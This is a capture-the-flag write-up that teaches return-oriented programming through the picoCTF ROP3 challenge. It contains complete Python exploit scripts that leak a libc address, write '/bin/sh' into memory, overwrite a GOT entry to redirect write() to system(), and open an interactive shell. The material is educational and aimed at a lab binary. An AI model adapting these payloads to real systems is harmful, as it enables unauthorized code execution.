Sunday, November 16, 2014

Anatomy of an ROP Attack: Case Study

In this article, we will learn the fundamentals of Return Oriented Programming (ROP) by dissecting a picoCTF problem about ROP. This will serve primarily as a primer on ROP, while the next article (ROP4 Writeup) will apply ROP to yet another problem. So let's begin by examining what ROP is, and why we are even using it.




**Disclaimer: If memory serves me right, when this challenge was live in 2013, ASLR was not in full randomization mode. Several months after the competition finished, ASLR was set to "2" (full randomization). This made the challenge more difficult to solve, and in this article I will discuss how to solve it even with ASLR at "2". For solutions that rely on the more conservative ASLR setting used during the actual competition, several write-ups are available online.**


Analyzing the source code


The ROP3 challenge from the picoCTF website offers us this rop3.c source code file:


#undef _FORTIFY_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

void vulnerable_function()  {
        char buf[128];
        read(STDIN_FILENO, buf,256);
}

void be_nice_to_people() {
        // /bin/sh is usually symlinked to bash, which usually drops privs. Make
        // sure we don't drop privs if we exec bash, (ie if we call system()).
        gid_t gid = getegid();
        setresgid(gid, gid, gid);
}

int main(int argc, char** argv) {
        be_nice_to_people();
        vulnerable_function();
        write(STDOUT_FILENO, "Hello, World\n", 13);
}

Pretty standard stuff, except for the dead giveaway: vulnerable_function. It contains a clear, textbook buffer overflow, because more bytes are read into the buffer than it was sized for: the function reads up to 256 bytes into a 128-byte buffer, which opens a huge security hole that we can take advantage of. To facilitate our exploitation, I'll be running this as a network service using netcat. On the picoCTF servers, nc -e doesn't work since a different distribution of netcat is installed there, but there is a workaround.






That simple bash while loop provides the same functionality as nc -e would. With the program running as a network service, we can just netcat ourselves on port 1234 and interact with an instance of ./rop3. This also lets us send and receive data from a running instance of ./rop3, which, as we'll see, is crucial for this ROP exploit to work: with ASLR on full randomization, a data leak is necessary.

Exploitation checklist

The first thing we can check is whether the stack is executable. If it is, the exploit is a trivial NOP sled + shellcode technique. As you can probably infer from the title of this article, the stack is nonexecutable, but let's verify.



In this snippet from my terminal, I download a useful utility known as checksec, which analyzes certain security features of a given binary. I give checksec execute permission and run it on the rop3 program on the picoCTF servers. As we can see in the picture, "NX enabled" tells us that the stack is nonexecutable. However, there are no stack canaries, so we don't have to worry about the infamous stack smashing protection!
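If you'd rather not fetch a separate tool, the core of checksec's "NX" check can be approximated in a few lines. The sketch below is an approximation under stated assumptions, not checksec's own code: it parses the ELF program headers with Python's struct module and reports whether the PT_GNU_STACK header requests an executable (PF_X) stack. A missing PT_GNU_STACK header is treated as executable, matching how older toolchains behaved.

```python
import struct

PT_GNU_STACK = 0x6474E551   # program header type that records stack permissions
PF_X = 0x1                  # "executable" bit in p_flags

def stack_is_executable(elf: bytes) -> bool:
    """Return True if the ELF image asks for an executable stack."""
    if elf[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    is64 = elf[4] == 2                      # EI_CLASS: 1 = 32-bit, 2 = 64-bit
    end = "<" if elf[5] == 1 else ">"       # EI_DATA: 1 = little-endian, 2 = big-endian
    if is64:
        (phoff,) = struct.unpack_from(end + "Q", elf, 32)
        phentsize, phnum = struct.unpack_from(end + "HH", elf, 54)
    else:
        (phoff,) = struct.unpack_from(end + "I", elf, 28)
        phentsize, phnum = struct.unpack_from(end + "HH", elf, 42)
    for i in range(phnum):
        entry = phoff + i * phentsize
        (p_type,) = struct.unpack_from(end + "I", elf, entry)
        if p_type != PT_GNU_STACK:
            continue
        # p_flags follows p_type directly in ELF64 but is the 7th word in ELF32
        (p_flags,) = struct.unpack_from(end + "I", elf, entry + (4 if is64 else 24))
        return bool(p_flags & PF_X)
    # no PT_GNU_STACK header: older toolchains defaulted to an executable stack
    return True
```

For example, stack_is_executable(open("rop3", "rb").read()) should return False for a binary that checksec reports as "NX enabled".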

Next on the checklist is ret2libc. If a libc function like system() or execlp() can be located precisely, we can bypass NX by overwriting the saved return address so that EIP lands on system(), with an argument of "/bin/sh". Our source code doesn't call any libc function that would directly facilitate the exploit, but let's do a quick debug of our binary and print out the location of system() to see if we can use it as an attack vector.


Uh-oh. The address of system() changes between runs! This means ASLR is enabled, and standard ret2libc isn't going to help us here: the address of system() isn't deterministic without additional information (I'll get to this a bit later). How aggressive is ASLR in this case? Doing a cat /proc/sys/kernel/randomize_va_space gives us the value "2", meaning ASLR is on full randomization. (For more information on the different "levels" of ASLR, read this document.) Environment variables live near the top of the stack, so they are randomized as well. Even if NX had been disabled and the stack were executable, locating shellcode stored in an environment variable would have been unpredictable between runs of the program, thanks to ASLR.
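For reference, here is a small sketch that reads the ASLR setting the same way the cat command does and maps it to the kernel's documented meanings for 0, 1 and 2. The names ASLR_LEVELS and aslr_level are made up for illustration, and on systems without /proc the helper simply returns None.

```python
ASLR_LEVELS = {
    0: "no randomization",
    1: "conservative: stack, mmap base (shared libraries) and VDSO randomized",
    2: "full: everything in level 1, plus the heap (brk area)",
}

def aslr_level(path="/proc/sys/kernel/randomize_va_space"):
    """Return the ASLR level as an int, or None if it cannot be read."""
    try:
        with open(path) as f:
            return int(f.read().strip())
    except (OSError, ValueError):
        return None

level = aslr_level()
print(level, ASLR_LEVELS.get(level, "unknown (not a Linux system?)"))
```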

So now what? Environment-variable based attacks won't work due to NX and ASLR, and ret2libc won't work because of ASLR. Here's an idea: instead of relying on randomized functions, why don't we reuse the parts of the binary that are fixed? If we can find bits and pieces within the binary itself that, when chained together, perform the exploit we want, we can bypass both NX and ASLR! This is the fundamental idea behind ROP: reuse code that's already in your binary. Because rop3 is not compiled as a position-independent executable, neither that code nor its location is randomized, which sidesteps ASLR; and because we never try to execute stack memory, NX isn't an issue. Additionally, ROP payloads follow the standard stack layout for function calls (the return address right after the function's address, and the arguments after that). ROP is like a lesson in recycling bits of your code to form exploits =)


Stackframes 101

Before delving deeper into this specific ROP-based exploit, let's examine a sample portion of the stack where a function call is made. This will be the basis for understanding ROP exploits.


So here we have the function strcpy(), which will copy STRING_2 into STRING_1 and return to RET-ADDR when finished. Notice how the return address sits in between the address of the function at hand (in this case strcpy) and its first argument. This structure should look strikingly familiar if you've done binary exploitation in the past: it is a standard ret2libc exploit! EIP is redirected to a function of choice, followed by a return address (which in many ret2libc exploits is either 0xAAAAAAAA or the address of exit()), and the arguments follow along. The same sort of exploit can be done with the components within your binary; you're just not returning into libc. But being limited to a single call to whatever is available within our binary isn't very helpful. Unless there's a plain old call to system("/bin/sh"), this technique alone won't get us far! This leads us to the idea of "chaining" multiple of these function calls.
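To make the layout concrete, here is a minimal sketch that builds such a frame with struct.pack, assuming a 32-bit little-endian target as in this challenge. The function name fake_call_frame and every address in it are hypothetical placeholders, not values taken from rop3.

```python
from struct import pack

def fake_call_frame(func_addr, ret_addr, *args):
    """Lay out one cdecl call as it sits on the stack once the saved
    return address has been overwritten (32-bit, little-endian).

    word 0: where the hijacked ret jumps (the function itself)
    word 1: where that function will ret to when it finishes
    word 2+: the function's arguments, first argument lowest in memory
    """
    return pack("<%dI" % (2 + len(args)), func_addr, ret_addr, *args)

# Hypothetical addresses, for illustration only.
STRCPY = 0x08048400
STRING_1 = 0x0804a018
STRING_2 = 0x08048600

frame = fake_call_frame(STRCPY, 0xAAAAAAAA, STRING_1, STRING_2)
print(frame.hex())
```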

Imagine that, while stepping through your binary, you find the location of the string "/bin" and the location of another string containing "/sh". You've also found an unused segment of memory that can hold these characters. And luckily for you, you can also find the address of a function such as strcpy(). The elements for spelling out an attack are right at your fingertips! Logically, if we can run strcpy(unused_memory,"/bin"); strcpy(unused_memory+4,"/sh"); we now have a location in memory containing the string "/bin/sh", and all that's left is to find a way to execute it! But wait a minute: I need to make 2 function calls with different sets of arguments. How in the world can I construct a stack that does that? Great question! The answer is also one of the most fundamental pieces of ROP. Let's explore.
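The two strcpy() calls join into one string because each copy also writes a terminating NUL byte, and the second copy starts exactly on top of the first one's NUL. The sketch below models this with a Python bytearray standing in for the unused memory; c_strcpy and c_string_at are hypothetical helpers that mimic C's behaviour, not real library calls.

```python
def c_strcpy(mem: bytearray, dest: int, src: bytes) -> None:
    """Mimic C strcpy(): copy src plus its terminating NUL to mem[dest:]."""
    data = src + b"\x00"
    mem[dest:dest + len(data)] = data

def c_string_at(mem: bytearray, addr: int) -> bytes:
    """Read a NUL-terminated C string starting at addr."""
    return bytes(mem[addr:mem.index(0, addr)])

unused_memory = bytearray(b"\xff" * 16)   # stand-in for a writable region
c_strcpy(unused_memory, 0, b"/bin")       # "/bin\0" at offsets 0-4
c_strcpy(unused_memory, 4, b"/sh")        # overwrites the NUL at offset 4
print(c_string_at(unused_memory, 0))      # b'/bin/sh'
```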

ROP baby steps


Referring back to our previous image of a stack frame for strcpy, it's easy to see that if we can control the return address and make it return again into strcpy with a different set of arguments, our master plan would work. The only problem is, if we simply make RET-ADDR = &strcpy, nothing useful is accomplished. After the initial strcpy is done, we return into strcpy again, but this time the return address would be STRING_1 (clearly invalid), and it would try to copy into STRING_2 whatever value sits above STRING_2 on the stack. Perhaps a picture would clear up some confusion.

Here is what the stack would look like if RET-ADDR were &strcpy:


The blue signifies the return address. The red strcpy has no problems executing: it copies STRING_2 into STRING_1 and returns into the blue STRCPY. The problems start unraveling as soon as the blue STRCPY starts running. To the blue STRCPY, its stack frame looks like this:











The problem here is that the blue strcpy is worse than useless: it will simply crash the program, since (the original) STRING_1 is not a valid return address. So how can we chain these function calls such that the red strcpy and the blue strcpy both execute properly, each with its own arguments and return address? If there is hope, it lies in the proles: gadgets.

Instead of returning directly into another function call, it would make more sense if we could somehow get rid of the 2 arguments and then lay out the stack frame for the next call to strcpy. What I mean is: if RET-ADDR (for the red strcpy) can somehow pop STRING_1 and STRING_2 off the stack and then call the (blue) strcpy with the appropriate arguments, we'd be in business. The code that does this is known in ROP terminology as a gadget. And good news: even small binaries like the one in the ROP3 picoCTF challenge are usually quite rich with gadgets! In general, a gadget is any short sequence of instructions that ends in a ret; the kind we need here is a series of x86 (or equivalent in other architectures) pop instructions followed by a ret. pop does exactly what it sounds like: it pops the next item off the stack into a register and advances ESP by 4 bytes, effectively getting "rid" of an argument. So if we can find a sequence of 2 pops followed by a ret in our binary, we'd be talking! The 2 pops advance ESP past STRING_1 and STRING_2, and the ret jumps to whatever address is stored on the stack just above STRING_2. So now, if we draw out our stack as follows:




We can have 2 strcpy calls! Upon further inspection, the red strcpy simply copies STRING_2 into STRING_1 and, once it's finished, returns into a pop/pop/ret sequence. This makes ESP jump over STRING_1 and STRING_2, and the ret then jumps to the next 4-byte value on the stack, which happens to be the address of the blue strcpy! A stack frame is now in place for the blue strcpy, following the same rules as the red one. This time we copy STRING_4 into STRING_3 and return into RET-ADDR-2, whatever it may be. It could even be another pop/pop/ret sequence, allowing us to call yet another function.
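The stack drawings can also be checked mechanically. The following toy simulator (a sketch, not a real emulator) treats the stack as a list of 32-bit words and follows the ret-driven control flow: a function "call" records its arguments and later returns through the word above them, while a pop/pop/ret gadget skips 2 words. All addresses are hypothetical. It runs both the naive RET-ADDR = &strcpy layout and the gadget-based chain.

```python
# Hypothetical addresses, for illustration only.
STRCPY = 0x08048400
POP_POP_RET = 0x0804855e
STOP = 0xdeadbeef                          # marker that ends the simulation
STRING_1, STRING_2 = 0x0804a018, 0x08048600
STRING_3, STRING_4 = 0x0804a01c, 0x08048610

FUNCTIONS = {STRCPY: ("strcpy", 2)}        # address -> (name, number of arguments)
GADGETS = {POP_POP_RET: 2}                 # address -> number of pops before its ret

def run_chain(stack, max_steps=32):
    """Follow ret-driven control flow through a list of 32-bit stack words.

    esp starts at the overwritten saved return address. Each step is a
    'ret' (eip = stack[esp]; esp += 1) followed by whatever lives at eip.
    Returns (calls made, "stopped" or a crash description)."""
    calls, esp = [], 0
    for _ in range(max_steps):
        eip, esp = stack[esp], esp + 1     # ret
        if eip == STOP:
            return calls, "stopped"
        if eip in FUNCTIONS:
            name, nargs = FUNCTIONS[eip]
            # on entry stack[esp] is the function's own return address and its
            # arguments follow; its final ret is the next loop iteration
            calls.append((name, tuple(stack[esp + 1:esp + 1 + nargs])))
        elif eip in GADGETS:
            esp += GADGETS[eip]            # pop; pop (the ret is the next iteration)
        else:
            return calls, "crash: jumped to 0x%08x" % eip
    return calls, "step limit reached"

good_chain = [STRCPY, POP_POP_RET, STRING_1, STRING_2,   # red strcpy frame
              STRCPY, STOP, STRING_3, STRING_4]         # blue strcpy frame
bad_chain = [STRCPY, STRCPY, STRING_1, STRING_2, STRING_3]  # RET-ADDR = &strcpy

print(run_chain(good_chain))
print(run_chain(bad_chain))
```

With good_chain, both strcpy calls receive their intended arguments and the chain reaches the STOP marker. With bad_chain, the second strcpy receives (STRING_2, STRING_3) and the next ret jumps to STRING_1, which is the crash described earlier.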

The purpose of all of this is to let us chain together sequences of function calls with their appropriate arguments, making exploitation that much more powerful. Since these pop/pop/ret sequences live within the binary itself, we can rest assured they won't be randomized, and since the addresses of functions such as strcpy can be determined given an information leak, ASLR is contemplating suicide =)


Plan of attack


Now that we know how to construct these stack frames for multiple function calls, let's build a plan of attack.

  1. No matter what, we need to somehow determine the location of system() at runtime so that grabbing a shell can even be possible. This can be done with an information leak and calculating offsets (I'll cover how to do this).
  2. The string "/bin/sh" needs to be placed somewhere in memory so that we can actually call system() with the correct argument to grab a shell. This can be done with read() calls.
  3. A call to system() must be forced. Because the address of system() is only known at runtime, after our payload has already been sent, we can't simply hard-code it as a return address. Instead, we need to trick EIP into jumping to a function that has been "spoofed" to be system(). This is perhaps the most obscure and initially tricky part of ROP to grasp, but once we see how it's done, it will all make sense.

Attack Phase 1


Obviously, ASLR is something we need to bypass effectively to land our exploit. Because libc functions such as system() are randomized, we need an information leak to calculate where they will be at runtime. Lucky for us, even though the address of system() may change from run to run, its offset (the difference, or "distance", between it and another libc function) remains the same regardless of ASLR, because ASLR moves the whole library as one block. This is good news! It means that if we calculate the offset between system() and write() to be 0xdeadbeef (for example) and we can then leak where write() currently resides in memory, we can add (or subtract) 0xdeadbeef to obtain the address of system! This, however, requires us to know, before runtime, a fixed location through which at least 1 libc function is reached. Using objdump and looking at the PLT (procedure linkage table), we can grab this information easily. Let's see some output:





An objdump -R tells us that both read() and write() have entries in the GOT (global offset table) at fixed locations! Jackpot! Digging a bit deeper reveals that read() and write() are implemented as jmps in the PLT. So where's the randomization? Everything seems to be fixed. The randomization lies in where those jmps actually land whenever we call read() or write(). The PLT stubs for read() and write(), and the GOT slots they jump through, are at fixed addresses, but the value stored in each slot (the real libc address) is random. Notice the asterisk in the red-boxed jmp instructions. Looks like pointer syntax, doesn't it? It can be thought of in that way: the pointer locations are known in advance, but where they point is the magic of ASLR.

Since offsets are consistent, we can calculate the offset between system() and write() by subtracting their addresses. Let's do this now.





The addresses of system() and write() are printed from a debug session. (As a side note, notice that the address of write is 0xf76caae0. This same value is stored in the "pointer", i.e. the GOT slot, that write() jumps through in the PLT.) The difference between the two is 657552, or equivalently 0xA0890 in hex. To prove that offsets remain consistent, I'll run a new gdb session, this time subtracting 0xA0890 from the address of write(), and we should get the beginning of the instructions for system().



Confirmed! We subtracted the offset we had previously determined (0xa0890) from the current address of write() and got the beginning of system() (shown in blue). To further prove the case, we examined the instructions where system() currently resides and got equivalent values (shown in green).
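The arithmetic can be reproduced in a few lines. This sketch uses the numbers from the gdb sessions (write() at 0xf76caae0, offset 0xA0890). To show why the offset survives ASLR, it also loads a model libc at a few random page-aligned base addresses. WRITE_IN_LIBC and SYSTEM_IN_LIBC are hypothetical positions inside libc; only their difference comes from the article.

```python
import random

OFFSET = 0xA0890              # write() - system(), measured in gdb
assert OFFSET == 657552       # the same value in decimal
LEAKED_WRITE = 0xf76caae0     # write() address printed in the gdb session

def system_from_write(leaked_write):
    """system() sits a fixed distance below write() in the same libc."""
    return leaked_write - OFFSET

print(hex(system_from_write(LEAKED_WRITE)))   # 0xf762a250

# Hypothetical positions inside libc; only their difference (OFFSET) matters.
WRITE_IN_LIBC = 0xcaae0
SYSTEM_IN_LIBC = WRITE_IN_LIBC - OFFSET

for _ in range(5):
    base = random.randrange(0xf7500, 0xf7700) << 12   # random page-aligned load address
    # ASLR moves the whole library, so the relation holds for every base
    assert system_from_write(base + WRITE_IN_LIBC) == base + SYSTEM_IN_LIBC
```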

So, to put this into perspective: if we can get the program to output (via its socket) the current address of write() back to us, we can subtract the offset (0xa0890) to get the address of system().

Implementing this in Python is fairly straightforward.


import socket
from struct import pack, unpack

def get_socket(chal):
    s = socket.socket()
    #s.settimeout(5)
    s.connect(chal)
    return s

offset = 0xa0890        # calculated by subtracting system() from write()
write = 0x080483a0      # write@plt, from objdump -D ./rop3 | grep write
write_addr = 0x804a010  # write's GOT entry (a.k.a. the "pointer" write@plt jumps through)
chal = ('127.0.0.1', 1234)  # connect to our netcat service

overflow = b"A" * 140   # after 140 filler bytes, the next 4 overwrite the saved return address (EIP)
payload = pack("<IIIII", write, 0xdeadbeef, 1, write_addr, 4)  # write(1, write_addr, 4)
rop = overflow + payload

s = get_socket(chal)
s.send(rop)
current_write = s.recv(4)
current_write = unpack("<I", current_write[0:4])[0]

print("write = ", hex(current_write))
print("system = ", hex(current_write - offset))

This simple script opens a socket connection to our netcat service and uses Python's struct.pack function to build the payload. The payload sets up a simple stack frame in which write() is called with the arguments 1 (meaning stdout), the address of write()'s "pointer" (its GOT entry), and 4 (since a 32-bit address is 4 bytes). The return address is just an arbitrary 0xdeadbeef (but we'll be getting to those pop/pop/pop/ret gadgets pretty soon!). Running this, we get the following output:



Great! We can get the address of system now!
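One caveat when adapting the script: s.recv(4) is allowed to return fewer than 4 bytes, in which case unpack() raises an error. A small helper that loops until it has exactly n bytes makes the leak more robust. This is a sketch assuming Python 3 sockets; recv_exact and read_leaked_address are hypothetical helper names, not part of the original exploit.

```python
import socket
from struct import unpack

def recv_exact(sock: socket.socket, n: int) -> bytes:
    """Read exactly n bytes; a single recv(n) may legally return fewer."""
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:  # peer closed the connection before sending n bytes
            raise ConnectionError("connection closed after %d of %d bytes" % (len(buf), n))
        buf += chunk
    return buf

def read_leaked_address(sock: socket.socket) -> int:
    """Interpret 4 leaked bytes as a little-endian 32-bit address."""
    return unpack("<I", recv_exact(sock, 4))[0]

# Usage in the leak script (hypothetical wiring):
#   s.send(rop)
#   current_write = read_leaked_address(s)
```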

Attack Phase 2


Now we must load the value "/bin/sh" into memory so that system() can actually be called on an argument that matters! So we're going to need to find a buffer that can hold "/bin/sh". A good place to start is the .data segment.




We've found an 8-byte location in memory that is not READONLY (and thus we can write to it!), which is enough room for the 7 characters of "/bin/sh" plus its NUL terminator. The address is 0x0804a018. To store "/bin/sh" there, we can instruct the rop3 program to call read() on stdin (which amounts to reading from the socket). We choose read() because, like write(), it has a PLT entry at a fixed location, so it's much easier to call read() than, say, strcpy() (whose address would have to be calculated using the offset method shown above).

In the following script we again exploit the rop3 program, this time to read the string "/bin/sh" into the empty buffer we found and then print it back out, so we can confirm that the read() did in fact take place correctly. This requires us to call 2 functions. See where this is going? We need a gadget! But not just a pop/pop/ret gadget: we need a pop/pop/pop/ret (triple pop, ret) gadget to skip over the file descriptor, the buffer, and the number of bytes (all 3 arguments of read()). As a side note, I've already determined the location of a pop/pop/pop/ret gadget within the binary, which is easy to find by running objdump -d rop3 and grepping for pop with -A3. Additionally, several tools exist (such as ropeme) that find ROP gadgets in your binaries.


import socket
import time
from struct import pack, unpack

def get_socket(chal):
    s = socket.socket()
    #s.settimeout(5)
    s.connect(chal)
    return s

pppr = 0x0804855d       # pop/pop/pop/ret gadget
read = 0x08048360       # read@plt, from objdump -D ./rop3 | grep read
offset = 0xa0890        # calculated by subtracting system() from write()
write = 0x080483a0      # write@plt, from objdump -D ./rop3 | grep write
write_addr = 0x804a010  # write's GOT entry (a.k.a. the "pointer")
buff = 0x0804a018       # writable 8-byte .data location, from objdump -x rop3

chal = ('127.0.0.1', 1234)  # connect to our netcat service

overflow = b"A" * 140   # the next 4 bytes overwrite the saved return address (EIP)
payload = pack("<IIIIIIIIII",
               read, pppr, 0, buff, 7,         # read(0, buff, 7), then pppr skips its 3 args
               write, 0xdeadbeef, 1, buff, 7)  # write(1, buff, 7)
rop = overflow + payload

s = get_socket(chal)
s.send(rop)
time.sleep(0.5)  # give the overflowing read() time to consume the payload before "/bin/sh" arrives

s.send(b"/bin/sh")  # consumed by the blocking read(0, buff, 7)

print("buff = " + s.recv(7).decode())



Great! This program produces the following output:




Success! We are writing "/bin/sh" into the .data segment buffer!
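As for the pop/pop/pop/ret gadget at 0x0804855d: besides objdump and grep, the search can be done directly on raw machine code. The sketch below only looks for single-byte "pop r32" opcodes (0x58 to 0x5f, skipping pop esp at 0x5c) followed by ret (0xc3), scanning every byte offset so that unaligned gadgets are found too. It assumes you have already extracted the bytes of an executable section (for example .text) and know its load address; the demo bytes are made up.

```python
# x86 one-byte "pop r32" opcodes (0x58 + register number), minus pop esp (0x5c)
POP_OPCODES = {0x58: "eax", 0x59: "ecx", 0x5a: "edx", 0x5b: "ebx",
               0x5d: "ebp", 0x5e: "esi", 0x5f: "edi"}
RET = 0xc3

def find_pop_ret_gadgets(code: bytes, base: int, pops: int):
    """Return (address, disassembly) for every run of `pops` single-byte
    pop instructions immediately followed by ret."""
    found = []
    for i in range(len(code) - pops):
        window = code[i:i + pops]
        if code[i + pops] == RET and all(b in POP_OPCODES for b in window):
            regs = "; ".join("pop " + POP_OPCODES[b] for b in window)
            found.append((base + i, regs + "; ret"))
    return found

# Made-up bytes: nop; pop esi; pop edi; pop ebp; ret; nop
demo = bytes.fromhex("905e5f5dc390")
for addr, text in find_pop_ret_gadgets(demo, 0x08048550, 3):
    print(hex(addr), text)
```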

Attack Phase 3


Whew! The first 2 items on the plan of attack are taken care of; now let's tackle the 3rd.

As we've seen with the 2 sample ROP-based programs above, the ROP payload itself is fixed once it is sent; all we can do is send and receive data over the socket to guide the payload along. We cannot modify the payload at runtime. This is why we need to somehow force (or, as we'll see, trick) EIP into executing system() when it thinks it's running something else.

Let's take a look at the source code once more to see where we can pull off the trickery.
#undef _FORTIFY_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

void vulnerable_function()  {
        char buf[128];
        read(STDIN_FILENO, buf,256);
}

void be_nice_to_people() {
        // /bin/sh is usually symlinked to bash, which usually drops privs. Make
        // sure we don't drop privs if we exec bash, (ie if we call system()).
        gid_t gid = getegid();
        setresgid(gid, gid, gid);
}

int main(int argc, char** argv) {
        be_nice_to_people();
        vulnerable_function();
        write(STDOUT_FILENO, "Hello, World\n", 13);
}

There's a suspicious write(STDOUT_FILENO,"Hello, World\n",13); just after the call to vulnerable_function(). If there's one lesson you should take away from all the blog posts and writeups you ever read about CTF challenges, it's that every line counts. That write() was put in there for a reason (it is what gives rop3 a PLT stub and a GOT entry for write()), and we shouldn't just ignore it. As a matter of fact, that innocent-looking call to write() is part of the reason why this exploit works and why we can get shell access on this vulnerable program. Let's see why.

In the same way that we can call read() to store the string "/bin/sh" into an empty buffer, we can call read() to store any sequence of bytes at any writable location we wish. This is more powerful than it may seem at first. Remember when we spoke about the PLT and how write() is implemented as a jmp through a pointer stored in the GOT? What is stopping us from storing the address of system(), which we've calculated from offsets, into that GOT slot? Nothing, since the GOT in rop3 is writable. As a result, the next time write() is called, the jmp will not take us to the instructions for write(), but to the instructions for system(). It's as if calling write() now calls system() instead. This is how we trick EIP into loading system() for us.
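Here is a toy model of that trick, assuming the GOT slot address from the article (0x804a010) and the write() address and offset from the earlier gdb sessions. A Python dict stands in for writable memory, and call_write_plt is a hypothetical stand-in for the write@plt stub's indirect jmp; no real memory is touched.

```python
OFFSET = 0xA0890                      # write() - system(), measured in gdb
LIBC_WRITE = 0xf76caae0               # write() in one particular run (changes under ASLR)
LIBC_SYSTEM = LIBC_WRITE - OFFSET     # system() in that same run
WRITE_GOT = 0x0804a010                # write's GOT slot in rop3: a fixed address

memory = {WRITE_GOT: LIBC_WRITE}      # toy writable memory: address -> 32-bit value
LIBC = {LIBC_WRITE: "write", LIBC_SYSTEM: "system"}

def call_write_plt():
    """Toy model of the write@plt stub, 'jmp *0x804a010': the destination
    is whatever value is currently stored in write's GOT slot."""
    return LIBC[memory[WRITE_GOT]]

before = call_write_plt()             # "write"
memory[WRITE_GOT] = LIBC_SYSTEM       # the effect of read(0, write_addr, 4) in the exploit
after = call_write_plt()              # "system"
print(before, "->", after)
```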

Tying it all together, we must get the address of system(), load "/bin/sh" into the .data segment buffer, and overwrite write()'s GOT slot so that it points to system(). After this, we can pop/pop/pop/ret into write (which will actually execute system()!) with a return address of 0xdeadbeef and the data segment buffer (which by then contains "/bin/sh") as its only argument.
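One constraint worth checking before running the full chain: all of it has to fit into the single read(STDIN_FILENO, buf, 256) in vulnerable_function(). The sketch below just adds up the 32-bit words of the four frames used in the exploit program (five words for each pppr-terminated call, three for the final call) on top of the 140 filler bytes; the frame labels are descriptive only.

```python
OVERFLOW = 140     # filler bytes before the saved return address
READ_LIMIT = 256   # read(STDIN_FILENO, buf, 256) in vulnerable_function()
WORD = 4           # size of one 32-bit stack slot

# (frame, number of 32-bit words), mirroring the pack() calls in the exploit
CHAIN = [
    ("write(1, write_addr, 4) + pppr", 5),      # function, gadget, 3 arguments
    ("read(0, buff, 7) + pppr", 5),
    ("read(0, write_addr, 4) + pppr", 5),
    ("write@plt(buff), i.e. system(buff)", 3),  # function, fake return, 1 argument
]

payload_len = OVERFLOW + WORD * sum(words for _, words in CHAIN)
spare = READ_LIMIT - payload_len
print(payload_len, "bytes used,", spare, "bytes spare")
```

It reports 212 bytes used and 44 to spare, so the whole chain fits in one read().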

Here's the program:


import socket
import time
from struct import pack, unpack

def get_socket(chal):
    s = socket.socket()
    #s.settimeout(5)
    s.connect(chal)
    return s

# notice this new shell() function, which allows us to interact with the shell
def shell(sock):
    command = ''
    while command != 'exit':
        command = input('$ ')
        sock.send((command + '\n').encode())
        time.sleep(.2)
        print(sock.recv(0x10000).decode(errors='replace'))

pppr = 0x0804855d       # pop/pop/pop/ret gadget
read = 0x08048360       # read@plt, from objdump -D ./rop3 | grep read
offset = 0xa0890        # calculated by subtracting system() from write()
write = 0x080483a0      # write@plt, from objdump -D ./rop3 | grep write
write_addr = 0x804a010  # write's GOT entry (a.k.a. the "pointer")
buff = 0x0804a018       # writable 8-byte .data location, from objdump -x rop3

chal = ('127.0.0.1', 1234)  # connect to our netcat service

overflow = b"A" * 140   # the next 4 bytes overwrite the saved return address (EIP)

payload = pack("<IIIII", write, pppr, 1, write_addr, 4)   # leak the current write() address
payload += pack("<IIIII", read, pppr, 0, buff, 7)         # read "/bin/sh" into buff
payload += pack("<IIIII", read, pppr, 0, write_addr, 4)   # overwrite write's GOT entry
payload += pack("<III", write, 0xdeadbeef, buff)          # write@plt(buff), now really system(buff)

rop = overflow + payload

s = get_socket(chal)
s.send(rop)

current_write = s.recv(4)
current_write = unpack("<I", current_write[0:4])[0]

# do some debugging =)
print("write = ", hex(current_write))
print("system = ", hex(current_write - offset))

s.send(b"/bin/sh")                          # store "/bin/sh" into the buffer
s.send(pack("<I", current_write - offset))  # system()'s address overwrites write's GOT entry

# by now we should have a shell! Let's interact!
shell(s)


Woohoo! Let's see it working!



The code executes the payload, and when we run ls, we get the files within the directory! But, more importantly, the key is rop_rop_rop_all_the_way_home



Well, that was a fun (and randomized) nut to crack! We leaked the address of write() and used a fixed offset to find out where system() would be, then stored "/bin/sh" into a location in memory, and finally overwrote the GOT entry for write() so that the next time write() was called, it actually jumped to system()!

I hope this was informative; please let me know if you have any comments =)
